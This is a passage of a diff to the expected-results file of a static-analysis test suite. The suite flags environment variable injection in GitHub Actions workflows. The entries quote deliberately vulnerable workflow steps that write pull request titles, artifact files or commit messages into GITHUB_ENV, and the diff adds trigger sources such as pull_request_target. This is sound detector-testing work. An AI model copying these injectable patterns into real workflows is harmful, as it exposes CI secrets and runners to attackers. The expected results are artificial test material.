an external user. | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | -| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | -| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | -| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | -| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | -| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | -| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | -| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
